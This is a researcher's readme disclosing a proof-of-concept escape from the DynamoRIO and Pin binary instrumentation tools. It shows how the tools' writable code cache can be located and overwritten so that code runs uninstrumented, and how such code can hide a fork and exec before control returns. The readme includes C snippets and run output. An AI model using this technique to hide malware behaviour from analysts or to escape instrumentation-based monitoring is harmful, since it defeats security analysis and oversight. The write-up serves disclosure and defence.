readme.md

Escaping DynamoRIO and Pin - or why it's a worse-than-you-think idea to run untrusted code or to input untrusted data

Before we begin, I want to clarify that both DynamoRIO and Pin are great tools that I use all the time. Dynamic Binary Modification is a very powerful technique in general. However, both implementations have a limitation which can have serious security implications for some uses cases and which, as far as I can tell, is not documented in the user manuals. I got in touch with people involved in both projects and they've explained that they consider it low risk for the typical usage scenario and that fixing it would add performance overhead. This is a perfectly reasonable position, but I think this sort of low risk / high impact issue should be very well and visibly documented.

Background

It all started after I've watched this Black Hat talk on detecting execution under a DBM tool. That's interesting enough, but at the moment it's more or less a trivial problem. Now, escaping from the control of a DBI tool should be more challening, right? Well, not so much.

How DBM works

DynamoRIO docs provide a nice, concise explanation. The gist of it is that the DBM tool scans and patches all application code before it executes. It does this by (bit of a simplification) decoding the instruction stream and transforming any position-dependent code into position-independent code. This patched code is stored in a separate memory location (called the code cache) from the original application code. In the end, all code will run from the code cache, but for transparency, things like return addresses and access to the Instruction Pointer (IP) register will be translated to make it appear the application is running from its original location. The basic units are the basic blocks (BBs), instruction sequences which have stricly one entry point and one exit point (any jump, branch, call instruction).

The issue

The first thing I've checked when looking for an escape strategy was the permissions of the code cache mapping. To my surprise (but for the practical reasons I've described in the first paragraph), both DynamoRIO and Pin map the code cache with read, write and execute permissions. This has at least two security-related implications:

it weakens some anti-exploit techniques of modern systems

it allows any applications to easily escape from the control of the DBM tool

Modern systems avoid mapping executable pages as writeable to make it more difficult to write exploits for vulnerable applications where the attacker can write to memory locations outside the intended buffers. Those systems can still be exploited with return oriented programming, however if executable memory is writeable when running under a DBM system, it might be possible either to directly overwrite the code cache or to reduce the complexity of required ROP code. I haven't yet investigated this scenario. The rest of this article is about the second issue.

The escape

This is an implementation for x86-64.

At this point we know that there will be some R/W/E mappings in the address space, but not much else. In order to write an exploit, he have to solve several problems:

How to find the address of the code cache? ASLR is used

How to determine which location in the code cache to use? Writing at the wrong place could either crash the process or never be triggered.

How to actually trigger the newly written code? If we simply have the application jump to it, the DBM system will just scan it and maintain control.

The first problem is easy enough to solve on Linux, the kernel exposes all mappings of the calling process in /proc/self/maps. If this feature isn't available, I suspect it's possible to find some references in stale stack data or to probe the address space, but I haven't checked.

The last two problems are related. My solution was to first execute some code containing a known and fairly unique pattern that doesn't get translated, for example a 32 bit immediate MOV with a known an valid address. Since I'm a bit lazy, I've decided to code the exploit in C and depend on the compiler to generate the instructions I need, so be warned that a different compiler or different settings might not produce usable results:

char msg[] = "It's a trap!\n";
voidtrap() {
printf(msg);
}

The msg array needs to be global, so that the compiler places it in the .data segment and setting the parameter for printf() in trap() gets encoded as a MOV instruction with the full address as an immediate value parameter:

After we have called trap() once, we can search all mappings for occurences of msg's address (which is encoded in the first MOV instruction above). If we avoid the pages beloging to the application's image and the stack, any matches are going to be copies of this MOV instruction in the code cache, except any unlucky coincidences.

Once the location(s) of the MOV instruction in the code cache is/are found, we are free to overwrite it with our shellcode which escapes from the DBM tool's control by jumping directly to a function in the .text segment:

escape() is our function which will execute directly, without being scanned or patched by the DBM tool:

voidescape() {
printf("Escaped!\n");
exit(0);
}

A more complete implementation would remove the signal handlers set up by the DBM system at this point, but this will do for us.

Finally, we can trigger the newly encoded instruction by calling trap() again.

The complete file is available in the same directory as this document with the name escape.c. If we execute the compiled executable directly, we get this output:

$ ./escape
It's a trap!
It's a trap!

However, when executed under DynamoRIO:

$ drrun -- ./escape
It's a trap!
Found at 0x50c2571d
Escaped!

And under Pin:

$ pin -- ./escape
It's a trap!
Found at 0x7f851c6cbe7d
Escaped!

Finally we should verify that the code in escape() executes directly and that it doesn't in fact execute from the code cache. One straightforward way of doing this is by using a system call tracing utility implemented as a Pin or DynamoRIO tool:

The last two systemcalls are write (1), one with length 13 (It's a trap!\n) and the other one with length 24 (Found at 0x7fe74fbf9e2d\n). Pin didn't detect the two systemcalls from escape(): write(stdout, "Escaped\n") and sys_exit, so we have definitely escaped.

There's more

At this point you might be thinking that while this could be a serious issue, it's really obvious if an application has escaped. That's incorrect. The following section describes a way to escape from the DBM tool's control, execute some completely uninstrumented code directly, and then gracefully return to the code cache and under the control of the DBM system which will continue to execute normally.

It will now fork and execute uname -s -m in the child process. This isn't something required for this technique to work, it's just an example of operations that could be hidden from the DBM system. We also modify the main function to execute printf("Back to CC\n"); after the second call to trap(), so we know if control is gracefully returned to the DBM system / code cache.

Now we are no longer able to overwrite the printf(msg) function call since we want it to execute as expected. Operations on volatile variables are an easy way to convince the compiler to fill some space with dummy code:

Notice the write calls for It's a trap, Found at 0x7f9c8489ee43, the second It's a trap, Back to CC and finally the sys_exit call. Note how there's no trace of write-ing Escaped!, fork-ing or execve, while the systemcalls executing after that, back under Pin's control, are included and everything else looks normal. Now, let's say you were instrumenting malware for analysis: it would have just sneaked a bunch of stuff including an exec() past you.

I really hope the manuals of DynamoRIO and Pin get updated with a warning about this.